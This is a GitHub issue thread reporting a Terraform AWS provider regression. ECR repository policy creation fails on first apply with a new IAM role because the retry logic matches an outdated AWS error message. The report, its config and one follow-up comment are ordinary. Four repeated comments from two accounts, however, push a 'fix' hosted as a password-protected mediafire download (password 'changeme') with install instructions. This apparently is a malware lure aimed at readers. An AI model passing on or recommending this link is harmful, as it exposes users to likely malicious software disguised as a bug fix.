### ISSUE TITLE
[Bug]: ECR repository policy creation fails when using newly created IAM role

### ISSUE THREAD

**Issue by imre-kerr-sb1** [hashicorp/terraform-provider-aws#39064]
### Terraform Core Version

1.9.5

### AWS Provider Version

5.64.0

### Affected Resource(s)

- aws_ecr_repository_policy
- aws_iam_role

### Expected Behavior

`terraform apply` should succeed.

### Actual Behavior

Applying the repository policy fails the first time. Running it a second time succeeds.

### Relevant Error/Panic Output Snippet

```shell
aws_ecr_repository.test: Creating...
aws_iam_role.test: Creating...
aws_ecr_repository.test: Creation complete after 1s [id=test-ecr-attach-policy-bug]
aws_iam_role.test: Creation complete after 1s [id=test-ecr-attach-policy-bug]
data.aws_iam_policy_document.describe_ecr_images: Reading...
data.aws_iam_policy_document.describe_ecr_images: Read complete after 0s [id=1275846024]
aws_ecr_repository_policy.test: Creating...
╷
│ Error: putting ECR Repository Policy (test-ecr-attach-policy-bug): operation error ECR: SetRepositoryPolicy, https response error StatusCode: 400, RequestID: ef06680f-271a-4909-99d3-62e8cedad7c1, InvalidParameterException: Invalid parameter at 'PolicyText' failed to satisfy constraint: 'Principal not found'
│ 
│   with aws_ecr_repository_policy.test,
│   on main.tf line 16, in resource "aws_ecr_repository_policy" "test":
│   16: resource "aws_ecr_repository_policy" "test" {
│ 
╵
```

### Terraform Configuration Files

```hcl
terraform {
  required_version = ">= 1.9.5"

  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "5.64.0"
    }
  }
}

resource "aws_ecr_repository" "test" {
  name = "test-ecr-attach-policy-bug"
}

resource "aws_ecr_repository_policy" "test" {
  repository = "${aws_ecr_repository.test.name}"
  policy     = "${data.aws_iam_policy_document.describe_ecr_images.json}"
}

data "aws_iam_policy_document" "describe_ecr_images" {
  statement {
    sid    = "DescribeImages"
    effect = "Allow"

    principals {
      type        = "AWS"
      identifiers = ["${aws_iam_role.test.arn}"]
    }

    actions = [
      "ecr:DescribeImages"
    ]
  }
}

resource "aws_iam_role" "test" {
  name = "test-ecr-attach-policy-bug"

  assume_role_policy = <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Action": "sts:AssumeRole",
      "Effect": "Allow",
      "Principal": {
        "Service": "ec2.amazonaws.com"
      }
    }
  ]
}
EOF
}
```

### Steps to Reproduce

`terraform apply`

### Debug Output

https://gist.github.com/imre-kerr-sb1/79968926a388f95da1bd6c994eaf57a1

### References

This is a regression of #1164, which was fixed in #1165. The [retry logic](https://github.com/hashicorp/terraform-provider-aws/blob/v5.64.0/internal/service/ecr/repository_policy.go#L78-L80) checks the error message:
```go
	_, err = tfresource.RetryWhenIsAErrorMessageContains[*types.InvalidParameterException](ctx, propagationTimeout, func() (interface{}, error) {
		return conn.SetRepositoryPolicy(ctx, input)
	}, "Invalid repository policy provided")
```
But AWS has since changed the error message to be more specific. ('Invalid repository policy provided' replaced with 'Principal not found').

### Would you like to implement a fix?

None

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by asw28** [comment]
I have a similar problem with Lightsail Container and ECR. ECR repo created through terraform, Lightsail through console. Connecting the container to the private repo via AWS management console produces this error:
```

SetRepositoryPolicyCommand[eu-central-1]

Invalid parameter at 'PolicyText' failed to satisfy constraint: 'Principal not found'

400
```
